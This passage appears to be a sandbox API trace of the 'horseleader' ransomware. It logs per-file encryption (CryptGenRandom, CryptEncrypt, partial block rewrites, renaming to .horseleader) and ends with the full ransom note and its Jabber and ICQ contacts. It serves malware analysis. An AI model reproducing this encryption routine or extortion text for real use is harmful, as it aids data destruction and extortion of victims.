Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.958] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0143.959] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Windows") returned -1 [0143.959] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0143.959] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".horseleader") returned 0x0 [0143.959] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0143.959] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="_uninstalling_.png") returned 1 [0143.959] lstrlenW (lpString=".testttjffg") returned 11 [0143.959] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpSrch=".testttjffg") returned 0x0 [0143.959] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.960] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.960] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0143.961] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0143.961] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".txt") returned 0x0 [0143.961] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2513920) returned 1 [0143.961] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.962] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0143.965] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.965] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0143.966] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x130600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.966] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.003] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.003] 
WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.003] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x260c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.004] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.027] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.027] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0144.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0144.028] CloseHandle (hObject=0x21c) returned 1 [0144.242] GetProcessHeap () returned 0x780000 [0144.242] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0144.242] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.horseleader") returned 95 [0144.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.horseleader")) returned 1 [0144.243] GetProcessHeap () returned 0x780000 [0144.243] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0144.243] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0144.243] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Windows") returned -1 [0144.244] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0144.244] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".horseleader") returned 0x0 [0144.244] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0144.244] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="_uninstalling_.png") returned 1 [0144.244] lstrlenW (lpString=".testttjffg") returned 11 [0144.244] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", 
lpSrch=".testttjffg") returned 0x0 [0144.244] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0144.244] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0144.244] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0144.245] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0144.245] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".txt") returned 0x0 [0144.245] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1450) returned 1 [0144.245] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0144.905] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.906] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0144.906] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.906] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0144.906] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0144.906] CloseHandle (hObject=0x21c) returned 1 [0144.907] GetProcessHeap () returned 0x780000 [0144.907] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0144.907] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.horseleader") returned 95 [0144.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.horseleader")) returned 1 [0144.909] GetProcessHeap () returned 0x780000 [0144.909] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0144.909] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0144.909] lstrcmpiW (lpString1="PubLR.cab", lpString2="Windows") returned -1 [0144.909] wnsprintfW (in: 
pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0144.909] StrStrIW (lpFirst="PubLR.cab", lpSrch=".horseleader") returned 0x0 [0144.909] lstrcmpW (lpString1="PubLR.cab", lpString2="#Decrypt#.txt") returned 1 [0144.909] lstrcmpW (lpString1="PubLR.cab", lpString2="_uninstalling_.png") returned 1 [0144.909] lstrlenW (lpString=".testttjffg") returned 11 [0144.909] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".testttjffg") returned 0x0 [0144.910] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0144.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0144.910] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0144.910] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0144.910] StrStrW (lpFirst="PubLR.cab", lpSrch=".txt") returned 0x0 [0144.910] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=9958388) returned 1 [0144.910] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.911] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 
[0145.731] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.731] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4bd1fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.732] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.738] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.738] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.739] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x97a3f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.739] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.758] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.758] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 
[0145.758] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.759] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0145.759] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0145.759] CloseHandle (hObject=0x21c) returned 1 [0150.643] GetProcessHeap () returned 0x780000 [0150.643] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0150.643] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.horseleader") returned 88 [0150.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.horseleader")) returned 1 [0150.645] GetProcessHeap () returned 0x780000 [0150.645] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0150.646] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, 
nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0150.646] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0150.646] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0150.646] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0150.646] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0150.646] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0150.646] lstrlenW (lpString=".testttjffg") returned 11 [0150.646] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0150.646] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.647] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0150.647] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0150.648] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0150.648] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0150.649] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1608) returned 1 [0150.649] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x648, lpOverlapped=0x0) returned 1 [0150.713] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.713] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x648, lpOverlapped=0x0) returned 1 [0150.714] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0150.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0150.714] CloseHandle (hObject=0x21c) returned 1 [0150.719] GetProcessHeap () returned 0x780000 [0150.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0150.719] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0150.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0150.721] GetProcessHeap () 
returned 0x780000 [0150.721] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0150.721] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0150.721] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0150.723] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0150.723] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0150.724] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
